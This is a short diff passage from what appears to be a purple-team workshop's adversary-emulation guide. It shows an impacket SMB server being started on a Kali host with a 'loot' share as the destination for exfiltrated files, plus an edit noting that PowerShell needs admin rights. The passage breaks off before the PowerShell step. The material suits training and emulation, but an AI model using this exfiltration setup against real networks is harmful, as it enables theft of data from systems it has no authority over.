tscomm99/purple-team-workshop-2025-01/emulation.md

 [KALI:bash] impacket-smbserver -smb2support -username user -password pass123 data ./loot
 ```

-And finally we exfiltrate the files that we want:
+And finally we exfiltrate the files that we want (make sure PowerShell is runnning with admin privileges):

 **Step 23**
 ```PowerShell